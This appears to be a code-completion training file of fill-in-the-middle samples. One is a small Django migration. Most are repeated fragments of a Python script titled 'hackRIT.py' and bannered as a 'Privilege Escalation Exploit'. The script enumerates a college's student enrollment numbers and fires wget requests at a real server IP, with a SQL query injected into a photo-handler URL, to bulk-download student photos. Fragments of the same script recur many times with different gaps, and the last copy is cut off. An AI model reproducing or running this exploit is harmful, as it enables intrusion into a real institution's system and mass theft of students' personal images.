field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.SoundDeviceInstructionManual/bytes/filename/mimetype'),
),
]<|fim▁end|> | # Generated by Django 2.1 on 2018-08-26 00:54
from django.db import migrations, models
|
<|file_name|>0002_auto_20180826_0054.py<|end_file_name|><|fim▁begin|># Generated by Django 2.1 on 2018-08-26 00:54
from django.db import migrations, models
class Migration(migrations.Migration):
<|fim_middle|>
<|fim▁end|> | dependencies = [
('model_filefields_example', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='book',
name='cover',
field=models.ImageField(blank=True, null=True, upload_to='model_filefields_example.BookCover/bytes/filename/mimetype'),
),
migrations.AlterField(
model_name='book',
name='index',
field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.BookIndex/bytes/filename/mimetype'),
),
migrations.AlterField(
model_name='book',
name='pages',
field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.BookPages/bytes/filename/mimetype'),
),
migrations.AlterField(
model_name='sounddevice',
name='instruction_manual',
field=models.FileField(blank=True, null=True, upload_to='model_filefields_example.SoundDeviceInstructionManual/bytes/filename/mimetype'),
),
] |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department<|fim▁hole|>elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images<|fim▁end|> | |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
<|fim_middle|>
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | year_choice = 1300000 #Final Year |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
<|fim_middle|>
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | year_choice = 1400000 #Third Year |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
<|fim_middle|>
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | year_choice = 1500000 #Second Year |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
<|fim_middle|>
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | year_choice = 1600000 #First Year |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
<|fim_middle|>
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | class_choice = 1000 #Automobile Department |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
<|fim_middle|>
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | class_choice = 2000 #Civil Department |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
<|fim_middle|>
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | class_choice = 3000 #ComputerScience Department |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
<|fim_middle|>
elif class_input == 5:
class_choice = 5000 #ETC Department
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
os.system("find ritphotos -size 0 -print0 |xargs -0 rm 2>/dev/null ") #Remove 0-Size Images
<|fim▁end|> | class_choice = 4000 #InformationTechnology Department |
<|file_name|>hackRIT.py<|end_file_name|><|fim▁begin|>import os
#Decoration Starts
print """
+=============================================================+
|| Privilege Escalation Exploit ||
|| +===================================================+ ||
|| | _ _ _ ____ _ __ ____ ___ _____ | ||
|| | | | | | / \ / ___| |/ / | _ \|_ _|_ _| | ||
|| | | |_| | / _ \| | | ' / | |_) || | | | | ||
|| | | _ |/ ___ \ |___| . \ | _ < | | | | | ||
|| | |_| |_/_/ \_\____|_|\_\ |_| \_\___| |_| | ||
|| | | ||
|| +===================================================+ ||
|| ~ by Yadnyawalkya Tale ([email protected]) ~ ||
+=============================================================+
"""
#Decoration Ends
# Class according to Year Input
print "\n1. B.Tech Final Year\n2. T.Y.B.Tech\n3. S.Y.B.Tech\n4. F.Y.Tech"
year_input = input()
if year_input == 1:
year_choice = 1300000 #Final Year
elif year_input == 2:
year_choice = 1400000 #Third Year
elif year_input == 3:
year_choice = 1500000 #Second Year
elif year_input == 4:
year_choice = 1600000 #First Year
# Department Class Input
print "\n1.Automobile\n2.Civil\n3.ComputerScience\n4.InformationTechnology\n5.ETC\n6.Electrial\n7.Mech"
class_input = input()
if class_input == 1:
class_choice = 1000 #Automobile Department
elif class_input == 2:
class_choice = 2000 #Civil Department
elif class_input == 3:
class_choice = 3000 #ComputerScience Department
elif class_input == 4:
class_choice = 4000 #InformationTechnology Department
elif class_input == 5:
<|fim_middle|>
elif class_input == 6:
class_choice = 8000 #Electrial Department
elif class_input == 7:
class_choice = 6000 #Mechanical Department
startflag = year_choice + class_choice #For eg. Start @ 1303000
if class_input == 7:
endflag = year_choice + class_choice + 70 +128 #Special Arrangement for Mechanical ;)
else:
endflag = year_choice + class_choice + 70 #For eg. End @ 1303070
os.system("mkdir ritphotos")
decoration="="
while startflag < endflag:
startflag = startflag + 1
cmd1 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(startflag,startflag)
os.system(cmd1)
decoration = "=" + decoration
print "{0}".format(decoration)
print "100%\tPlease Wait..."
pstartflag = year_choice + class_choice + 150000
if class_input == 7:
pendflag = year_choice + class_choice + 40 + 150000 #For All branches
else:
pendflag = year_choice + class_choice + 15 + 150000 #Special Arrangement for Mechanical ;)
while pstartflag < pendflag:
pstartflag = pstartflag + 1
cmd2 = "wget http://210.212.171.168/ritcloud/StudentPhoto.ashx?ID=SELECT%20Photo%20FROM%20StudMstAll%20WHERE%20EnrollNo%20=%20%27{0}%27 -O ritphotos/photo_{1}.jpg 2>/dev/null ".format(pstartflag,pstartflag)
os.system(cmd2)
print "Downloading Images Complete..."
